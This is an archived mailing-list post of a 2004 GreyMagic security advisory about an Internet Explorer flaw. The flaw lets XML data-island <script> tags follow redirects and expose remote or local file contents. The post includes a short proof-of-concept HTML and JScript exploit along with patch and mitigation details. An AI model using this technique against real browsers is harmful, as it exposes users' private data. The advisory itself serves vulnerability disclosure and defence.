Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] Regression in IE: Accessing remote/local content in IE (GM#0

from [GreyMagic Security] Network Security [Permanent Link]
Subject: [VulnWatch] Regression in IE: Accessing remote/local content in IE (GM#009-IE)
Date: Tue, 12 Oct 2004 18:54:04 +0200 
For further information on the regression itself see "Solution" section.

GreyMagic Security Advisory GM#009-IE
=====================================

By GreyMagic Software, 23 Aug 2002, 12 Oct 2004. 

Available in HTML format at
http://www.greymagic.com/security/advisories/gm009-ie/.

Topic: Accessing remote/local content in IE.

Discovery date: 18 Feb 2002.

Affected applications: 
======================

All tested versions of Microsoft Internet Explorer (IE5+); prior versions
may be vulnerable as well. 

Note that any other application that uses Internet Explorer's engine
(WebBrowser control) is affected as well (Outlook, MSN Explorer, etc.). 


Introduction: 
=============

Back in 1997, when Internet Explorer 4 was first released, XML was just
starting to become popular. The popularity of XML prompted Microsoft to
devise the early prototype of XML data-islands, using the <script> element
in conjunction with the "language" attribute set to "XML". 

When Internet Explorer 5 was released the <script> data-island had been
replaced with the more intuitive <xml> data-island. But even though the
<script> syntax was now deprecated, Microsoft kept it for the sake of
backwards compatibility. 


Discussion: 
===========

By default the <script> data-island only allows URLs from the same domain as
the document to be assigned to its "src" attribute. Unfortunately, it fails
to correctly validate its "src" attribute against a redirection, which
potentially allows any web page to do the following: 

* Read XML files from any URL. 
* Read portions of non-XML files from any URL. 
* Read local XML files, in some setups. 
* Read portions of local non-XML files, in some setups. 

Any of the exploitations above may expose sensitive and private information
belonging to the user. 

The <script> data-island can be exploited by assigning a URL to the "src"
attribute, which will redirect to a local or remote location. The XML engine
will then process the content of that location. 

In case the location does not contain valid XML content, parts of it can
still be read by using XMLDOM's error mechanism. The "srcText" property of
the "parseError" object will contain the line of text that could not be
parsed by the engine. If the content does not contain line breaks at all
then the entire content may be exposed. 


Exploit: 
========

This example reads the contents of a remote URL, "getFile.asp" redirects to
the desired location, allowing us to read it: 

<script language="xml" src="getFile.asp" id="oFile"></script>
<script language="jscript">
onload=function () {
    var oXD=oFile.XMLDocument,
        oPE=oXD.parseError;

    alert(
        oXD.firstChild || oPE.line>0 ?
            "File found!\n"+
            "Details:\n\n"+
            (oXD.xml || "Line "+oPE.line+" contains '"+oPE.srcText+"'")
        :
            "File does not exist or could not be retrieved."
    );
}
</script>


Solution: 
=========

Microsoft was first informed on 18 Feb 2002, a patch was finally released on
22 Aug 2002 after a long investigation and testing period. 

The patch may be downloaded from:
http://www.microsoft.com/technet/security/bulletin/ms02-047.asp.

** Update - 9 Oct 2004 **

There has been a regression in Internet Explorer that causes it to be
vulnerable to this issue once again. The regression was spotted by Georgi
Guninski in an advisory from 7-Oct-2004
(http://www.guninski.com/where_do_you_want_billg_to_go_today_1.html). 

Interestingly enough, the regression is only visible when the <script> block
is introduced as static HTML in the page, dynamic blocks (via
document.write) are protected. 

Disable Active Scripting in order to protect yourself from this
vulnerability.


Tested on: 
==========

IE5 NT4, remote locations only.
IE5.5 Win98, remote locations only.
IE5.5 NT4, both remote and local locations.
IE6 Win2000, remote locations only.
IE6 WinXP, both remote and local locations.


Demonstration:
==============

A fully dynamic proof-of-concept demonstration of this issues is available
at http://www.greymagic.com/security/advisories/gm009-ie/.


Disclaimer: 
===========

The information in this advisory and any of its demonstrations is provided
"as is" without warranty of any kind. 

GreyMagic Software is not liable for any direct or indirect damages caused
as a result of using the information or demonstrations provided in any part
of this advisory. 

- Copyright (c) 2004 GreyMagic Software.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] Regression in IE: Accessing remote/local content in IE (GM#009-IE), GreyMagic Security <=
Previous by Date:  [VulnWatch] UPDATED: Quick JPEG/GDI test & fix (timesaver), GuidoZ
Next by Date:  Microsoft Internet Explorer Install Engine Control Buffer Overflow, NGSSoftware Insight Security Research
Previous by Thread:  [VulnWatch] UPDATED: Quick JPEG/GDI test & fix (timesaver), GuidoZ
Next by Thread:  Microsoft Internet Explorer Install Engine Control Buffer Overflow, NGSSoftware Insight Security Research
Indexes:  [Date] [Thread] [Top] [All Lists]